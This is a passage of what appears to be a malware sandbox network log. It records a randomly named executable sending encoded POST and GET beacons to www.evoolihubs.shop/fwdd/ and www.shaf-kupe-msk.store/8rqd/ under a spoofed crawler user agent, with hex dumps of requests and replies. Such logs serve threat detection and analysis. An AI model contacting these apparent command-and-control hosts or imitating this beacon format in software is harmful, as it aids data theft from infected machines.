                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.649752188.114.96.3805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:38.881293058 CEST728OUTPOST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 57 2f 6c 4c 38 53 37 55 5a 76 79 59 2b 75 6d 51 6f 51 5a 37 47 62 52 35 56 70 69 6a 48 4f 53 76 41 48 65 51 63 33 76 62 6b 34 2b 4e 50 73 75 6a 44 51 50 71 4b 61 72 31 51 41 30 6d 7a 57 36 46 57 53 6b 5a 43 58 30 47 50 2f 52 41 4d 63 52 72 77 4b 53 2f 37 75 41 72 76 59 61 43 4b 4b 59 4e 35 71 34 36 4d 69 70 55 47 37 72 7a 37 2f 78 33 72 4f 61 52 6a 41 77 50 55 6b 2f 36 42 68 39 44 54 59 4d 6f 67 4c 33 61 34 30 78 59 57 42 47 77 33 42 62 4c 59 77 44 63 6d 6a 68 72 78 35 4a 69 4a 74 7a 4b 63 62 56 56 7a 6a 50 63 52 7a 6b 54 65 58 2b 54 65 62 6b 6f 55 51 6d 38 56 71 70 4f
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCW/lL8S7UZvyY+umQoQZ7GbR5VpijHOSvAHeQc3vbk4+NPsujDQPqKar1QA0mzW6FWSkZCX0GP/RAMcRrwKS/7uArvYaCKKYN5q46MipUG7rz7/x3rOaRjAwPUk/6Bh9DTYMogL3a40xYWBGw3BbLYwDcmjhrx5JiJtzKcbVVzjPcRzkTeX+TebkoUQm8VqpO
                                                          Jul 13, 2024 00:04:39.340420008 CEST855INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:39 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FY%2FS1Y0M%2BLjGruJJqCoVXnS5HX4CqdNr6YIZdjbYJuT1qLPXzzZ%2F6pIxE8XUW%2FJIfQycoVZQD0ztt4bvx30PhFNqOPe9fIr8SH6mZa%2FEk%2FKcaCFMCwIh8B0ZERlh49fCk4St74rm"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454898e506a4e-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.649753188.114.96.3805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:41.421397924 CEST752OUTPOST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 6d 76 41 6d 75 51 64 31 58 62 6c 34 2b 4e 46 4d 75 6d 63 41 50 74 4b 61 33 44 51 42 49 6d 7a 53 61 46 57 57 67 5a 42 6d 30 42 4a 76 52 4f 45 38 52 74 74 61 53 2f 37 75 41 72 76 63 4b 6f 4b 4b 41 4e 36 65 38 36 4b 44 70 62 4c 62 72 77 38 2f 78 33 39 2b 61 56 6a 41 77 74 55 68 62 41 42 6a 56 44 54 59 63 6f 67 65 58 5a 7a 30 78 6b 4c 78 48 56 6d 78 43 33 61 44 71 2b 68 42 67 4c 75 2b 4a 64 4d 62 79 51 41 6f 56 32 68 7a 76 65 52 78 38 68 65 33 2b 35 63 62 63 6f 47 48 71 62 61 65 4d 74 55 6b 64 2b 36 45 43 50 46 2f 34 34 34 70 43 43 48 66 66 2f 76 41 3d 3d
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsmvAmuQd1Xbl4+NFMumcAPtKa3DQBImzSaFWWgZBm0BJvROE8RttaS/7uArvcKoKKAN6e86KDpbLbrw8/x39+aVjAwtUhbABjVDTYcogeXZz0xkLxHVmxC3aDq+hBgLu+JdMbyQAoV2hzveRx8he3+5cbcoGHqbaeMtUkd+6ECPF/444pCCHff/vA==
                                                          Jul 13, 2024 00:04:41.899492979 CEST853INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:41 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:41 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELBF37mziYz1534%2FVe7%2BxDmEwew2D9C762qVV%2FY9Y%2F5ANic6OHw7qfSA043fLENrSOdb7waRH7XIoYasSlCVYYQ3XoM%2FjnL3kXzDF5QdhkFLMcGwOrfALw02IUIU0pPgltd%2FEKA2"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454997a4919c3-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.649754188.114.96.3805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:43.955631018 CEST1765OUTPOST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 65 76 44 51 61 51 64 55 58 62 6d 34 2b 4e 65 4d 75 6e 63 41 4f 78 4b 61 76 66 51 42 45 59 7a 55 57 46 58 31 34 5a 41 53 6f 42 41 76 52 4f 47 38 52 6f 77 4b 54 33 37 75 77 76 76 59 75 6f 4b 4b 41 4e 36 66 4d 36 4e 53 70 62 4a 62 72 7a 37 2f 78 37 72 4f 61 35 6a 44 41 58 55 68 66 51 42 53 31 44 54 34 73 6f 68 74 2f 5a 77 55 78 6d 49 78 48 33 6d 78 2b 53 61 43 47 59 68 41 46 6b 75 35 4a 64 50 4d 48 74 46 4b 5a 4f 69 53 2f 64 45 79 38 72 65 48 2b 38 59 61 34 6e 57 51 65 45 5a 2b 4d 48 52 7a 64 54 30 53 62 45 45 74 55 31 37 35 2f 72 4f 64 4b 73 74 63 76 78 51 32 31 5a 2f 41 73 4e 6c 61 67 56 76 32 70 55 49 32 77 31 77 6c 4a 4a 6a 55 33 69 78 48 4f 68 47 30 58 51 38 34 73 47 41 67 2b 36 64 64 73 6f 4f 66 65 78 74 69 47 49 75 45 4b 69 78 5a 65 69 34 37 45 79 68 5a 4b 79 46 30 52 73 42 34 49 41 45 78 2b 72 54 61 38 31 34 73 50 53 71 49 67 54 2f 76 6e 69 41 74 [TRUNCATED]
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsevDQaQdUXbm4+NeMuncAOxKavfQBEYzUWFX14ZASoBAvROG8RowKT37uwvvYuoKKAN6fM6NSpbJbrz7/x7rOa5jDAXUhfQBS1DT4soht/ZwUxmIxH3mx+SaCGYhAFku5JdPMHtFKZOiS/dEy8reH+8Ya4nWQeEZ+MHRzdT0SbEEtU175/rOdKstcvxQ21Z/AsNlagVv2pUI2w1wlJJjU3ixHOhG0XQ84sGAg+6ddsoOfextiGIuEKixZei47EyhZKyF0RsB4IAEx+rTa814sPSqIgT/vniAtYQMh18v1extfsGxCZANKYthmlaRXOrPk6fLAiLPJSxl17GkLS/WdHFw8C0hR+zYEoAnaH8l6RcdHxiqFvEVg/6wdIWlbtB52d+Lp1eqJKu1VhzSgbhkBP+0iSJRwda1uSczyiOuIMs12UoawmJzfRVJhOdpUTEivjigxN1DUBAJ/6iW+gmY5w0VY+BOEO0OrYaUm4VtBH04Q/S7/okAaCSxY1WFqdOEUVQurdayLrswjXhIi2ziEIHzIvOfcSM0tPa+l0FcqCZrBApxRcoeBeRxpRbkT1jIEdQbflUvU3Qd9sAWYW2v6nRhczkdPfzisCuPD7C8N6XSTrhOigRYVowVGEBixySe5XaVDc6X9PZ5pPHBqgkBWC+sgO7I9B6LYyE/YcB37v7hYzRs+cUbEOXwR+xgO6favovQRXBut6gxm5JpcTIxIYTKBh2x7tLOkxhFsCHcz/+XIZNaQw9I/4aTCQ2SCz5csH7Y+b2SWHZLV6a3vIk/tklYIGDBSC7g/fs8hDqpCylHFfUulUT7o98rDJwC+ytGqE5OUSo7tjZ59A5EGuPQKGFlgdDd1Al10j+H5KLiCGHeenVV1ELC5HvSxMuJkgLz+Nn2ZJVgW+Hcilwf6A9wuwx5Yr3yQKMLT7Sw6k653MlOh2Jw4IOqH8g32dg9RT3Oz4E [TRUNCATED]
                                                          Jul 13, 2024 00:04:44.435503006 CEST859INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:44 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q0C1pHszJ%2B6dGK1amJiRMaISW%2FIfCa%2FpDDQDIPd6l7n%2F7ustvALSmXQNB%2BEXGV9%2BerFwhs%2BCnuTFd7pGwb1JvuqTIYOQY%2BSiF7ddWhY2KAD%2F74A3I7unXUWPusU23F7ffQetszN"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454a95eec8c15-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.649755188.114.96.3805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:46.484648943 CEST469OUTGET /fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:46.941668034 CEST998INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:46 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:46 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2StsB6JwFYp%2BF%2F8CwbVIo4h%2FhD3E4BHrq%2Bc7kX9w%2F1%2FzjCQeEwoqani0%2Fj6yZpmu8LB76fEH49TIBMztczHCH4R48XYUrnt1nLYT4%2F2e9yQyIMvXPagjOvs9I82qjw30mWhVK9i"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454b90d2b1a30-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.64975645.130.41.38805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:52.320529938 CEST740OUTPOST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 46 45 45 69 6f 77 61 54 69 67 39 71 2b 69 4e 56 32 5a 73 39 55 64 38 39 48 30 61 78 58 65 52 69 7a 7a 74 4d 46 33 6c 74 44 41 55 68 62 75 73 32 59 63 33 70 2b 36 6d 7a 59 34 6f 54 63 6f 46 6b 6a 6d 50 66 6c 64 48 72 77 30 71 77 69 55 2f 66 78 43 53 46 7a 42 65 43 4e 75 4a 52 2f 63 6d 48 7a 72 52 34 37 32 6b 62 36 48 42 52 62 66 4a 6e 79 33 45 37 44 31 69 50 6b 72 36 73 5a 30 70 72 70 79 6d 57 71 52 4d 50 69 52 33 6d 7a 31 55 48 4e 2b 6b 54 77 31 4f 70 55 61 35 44 4e 46 48 4e 30 4e 6d 6c 44 58 6c 79 54 67 65 61 31 65 4a 48 6e 2b 56 2f 6c 59 4a 7a 31 30 72 75 66 71 53
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZFEEiowaTig9q+iNV2Zs9Ud89H0axXeRizztMF3ltDAUhbus2Yc3p+6mzY4oTcoFkjmPfldHrw0qwiU/fxCSFzBeCNuJR/cmHzrR472kb6HBRbfJny3E7D1iPkr6sZ0prpymWqRMPiR3mz1UHN+kTw1OpUa5DNFHN0NmlDXlyTgea1eJHn+V/lYJz10rufqS
                                                          Jul 13, 2024 00:04:53.028438091 CEST483INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:52 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ|.CAc`%E0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.64975745.130.41.38805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:54.858742952 CEST764OUTPOST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 6d 52 68 57 50 74 65 55 33 6c 71 44 41 55 31 4c 76 6e 34 34 64 37 70 2b 32 66 7a 61 38 6f 54 63 55 46 6b 68 75 50 66 55 64 45 72 67 30 30 34 43 55 75 41 42 43 53 46 7a 42 65 43 4e 71 77 52 38 73 6d 47 47 6a 52 33 36 32 6e 46 71 48 43 59 37 66 4a 6a 79 32 44 37 44 31 55 50 6c 33 63 73 61 4d 70 72 70 43 6d 58 37 52 50 45 69 52 39 6f 54 31 43 4a 74 7a 62 56 78 51 30 32 6c 61 44 63 65 56 73 49 43 4d 38 35 77 58 47 67 44 41 63 61 33 47 37 48 48 2b 2f 39 6c 67 4a 68 69 34 4d 68 72 50 78 68 31 77 53 46 6c 36 7a 78 5a 42 55 4e 6c 4f 48 35 79 4c 45 75 41 3d 3d
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhmRhWPteU3lqDAU1Lvn44d7p+2fza8oTcUFkhuPfUdErg004CUuABCSFzBeCNqwR8smGGjR362nFqHCY7fJjy2D7D1UPl3csaMprpCmX7RPEiR9oT1CJtzbVxQ02laDceVsICM85wXGgDAca3G7HH+/9lgJhi4MhrPxh1wSFl6zxZBUNlOH5yLEuA==
                                                          Jul 13, 2024 00:04:55.566567898 CEST483INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:55 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ|.CAc`%E0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.64975845.130.41.38805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:57.390508890 CEST1777OUTPOST /8rqd/ HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.shaf-kupe-msk.store
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.shaf-kupe-msk.store/8rqd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
